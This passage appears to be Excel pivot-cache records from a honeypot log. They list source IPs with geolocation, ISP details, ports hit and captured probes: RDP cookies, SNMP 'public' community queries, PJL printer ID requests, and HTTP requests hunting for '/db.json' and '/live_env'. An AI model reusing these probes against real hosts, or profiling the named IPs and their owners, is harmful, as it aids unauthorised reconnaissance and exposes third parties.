mp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_RDP_H14&amp;&amp;SMA-LAB_PJL_H28&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_MSSQL_H41&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_SOCKS5_H9&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_POP3_H17"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;22&amp;&amp;631&amp;&amp;445&amp;&amp;443&amp;&amp;80&amp;&amp;9100&amp;&amp;5900&amp;&amp;62738&amp;&amp;143&amp;&amp;3389&amp;&amp;22&amp;&amp;2920&amp;&amp;21&amp;&amp;NA&amp;&amp;1080&amp;&amp;161&amp;&amp;51332&amp;&amp;6379&amp;&amp;1521&amp;&amp;49862&amp;&amp;6667&amp;&amp;110&amp;&amp;3306&amp;&amp;5432&amp;&amp;53746&amp;&amp;1433&amp;&amp;23&amp;&amp;54032&amp;&amp;55117&amp;&amp;49471&amp;&amp;54331&amp;&amp;53988&amp;&amp;50892&amp;&amp;51091"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;command&amp;&amp;GET&amp;&amp;stshash&amp;&amp;request&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,65230)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,65236)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,65238)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,64698)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,64700)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,64708)}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aiOuuYzpG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OVqBmv'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GjVoNe'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vJbcDkYLr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZEcNFI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yjSzZy'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lNpIxpUAP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JvQcnH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NfRUEY'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,60646)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,60648)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,60656)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,59240)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,59186)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,59196)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.120,59210)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mtjVxEYSb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=rGaTDs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WNjtiN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JVHeYAEVe'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LYLKZX'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KYEOTh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=rVKJhxccZ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aMUgLf'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qdcADa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EyADzpifn'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:8478"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1856"/>
    <x v="1856"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T11:10:48"/>
    <d v="2023-12-03T07:58:00"/>
    <d v="2025-04-14T11:10:48"/>
    <n v="760"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;17096&amp;&amp;NA&amp;&amp;47291"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2573:433b"/>
    <s v="None&amp;&amp;C-I&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1857"/>
    <x v="1857"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T11:09:11"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-14T11:09:11"/>
    <n v="121"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H37&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;62504&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.1967"/>
    <s v="106.822"/>
    <s v="17995"/>
    <s v="PT iForte Global Internet"/>
    <s v="PT iForte Global Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,50524)}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,51079)}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,53211)}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,53755)}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,51926)}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,52741)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,56755)}&amp;&amp;{Data_SMB:Incoming connection (103.182.184.170,57230)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67b6:b8aa"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1858"/>
    <x v="1858"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T10:57:06"/>
    <d v="2024-03-23T06:35:57"/>
    <d v="2025-04-14T10:57:06"/>
    <n v="3357"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_SSH_H16&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;389&amp;&amp;80&amp;&amp;22&amp;&amp;443&amp;&amp;445&amp;&amp;63339&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai (Pattinapakkam)"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.027"/>
    <s v="80.2757"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="ABTS Tamilnadu"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (122.165.66.138,52233)}&amp;&amp;{Data_SMB:Incoming connection (122.165.66.138,52697)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa5:428a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1859"/>
    <x v="1859"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T10:55:15"/>
    <d v="2023-10-20T13:37:40"/>
    <d v="2025-04-14T10:55:15"/>
    <n v="18749"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;6253&amp;&amp;1433&amp;&amp;3306&amp;&amp;445&amp;&amp;60065&amp;&amp;60672"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Surat"/>
    <s v="1255364"/>
    <s v="395003"/>
    <s v="21.1702"/>
    <s v="72.8311"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (117.251.22.176,60065)}&amp;&amp;{Data_SMB:Incoming connection (117.251.22.176,60672)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:16b0"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1860"/>
    <x v="1860"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T10:53:24"/>
    <d v="2025-04-14T10:52:09"/>
    <d v="2025-04-14T10:53:24"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4595"/>
    <s v="77.0266"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="cellular"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="2011-03-17"/>
    <s v="NOIDA-DELHI-NCR"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6ad7:9e54"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1861"/>
    <x v="1861"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T10:51:40"/>
    <d v="2025-04-14T10:51:40"/>
    <d v="2025-04-14T10:51:40"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Oxfordshire"/>
    <s v="Kidlington"/>
    <s v="2645722"/>
    <s v="NA"/>
    <s v="51.8217"/>
    <s v="-1.2886"/>
    <s v="13285"/>
    <s v="OPALTELECOM-AS"/>
    <s v="TalkTalk"/>
    <s v="consumer"/>
    <s v="TalkTalk Communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:267:6e9c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1862"/>
    <x v="1862"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T10:51:02"/>
    <d v="2025-04-14T10:48:41"/>
    <d v="2025-04-14T10:51:02"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="cellular"/>
    <s v="Wimax Project"/>
    <s v="2007-08-01"/>
    <s v="WiMAX-BB"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f5:571"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1863"/>
    <x v="1863"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T10:42:31"/>
    <d v="2025-03-25T05:26:21"/>
    <d v="2025-04-14T10:42:31"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="WLS"/>
    <s v="Wales"/>
    <s v="Cardiff"/>
    <s v="Cardiff"/>
    <s v="2653822"/>
    <s v="CF10"/>
    <s v="51.4837"/>
    <s v="-3.1681"/>
    <s v="5089"/>
    <s v="Virgin Media Limited"/>
    <s v="TalkTalk"/>
    <s v="business"/>
    <s v="The Vale Hotel Golf and Spa"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:561c:4cae"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1864"/>
    <x v="1864"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T10:27:31"/>
    <d v="2025-03-28T17:02:08"/>
    <d v="2025-04-14T10:27:31"/>
    <n v="60"/>
    <s v="SQTK_GTDN"/>
    <s v="['anonymous-proxy']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="SMA-LAB_RDP_H10&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="3389&amp;&amp;3306&amp;&amp;110&amp;&amp;1521&amp;&amp;21&amp;&amp;1433&amp;&amp;143&amp;&amp;443&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="True"/>
    <s v="vpn"/>
    <s v="medium"/>
    <s v="['anonymous-proxy']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="62240"/>
    <s v="Clouvider Limited"/>
    <s v="Clouvider Limited"/>
    <s v="cellular"/>
    <s v="VPN Consumer Amsterdam, The Netherlands"/>
    <s v="2019-07-12"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;stshash&amp;&amp;login"/>
    <s v="{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;NA&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': '*', 'Connection': 'keep-alive', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': '*', 'Connection': 'keep-alive', 'Content-Length': '13', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0', 'method': 'POST', 'uri': '/live_env%20'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': '*', 'Connection': 'keep-alive', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/db.json'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': '*', 'Connection': 'keep-alive', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d80:c79f"/>
    <s v="C-I"/>
    <s v="medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1865"/>
    <x v="1865"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T10:17:16"/>
    <d v="2023-09-03T09:34:00"/>
    <d v="2025-04-14T10:17:16"/>
    <n v="28"/>
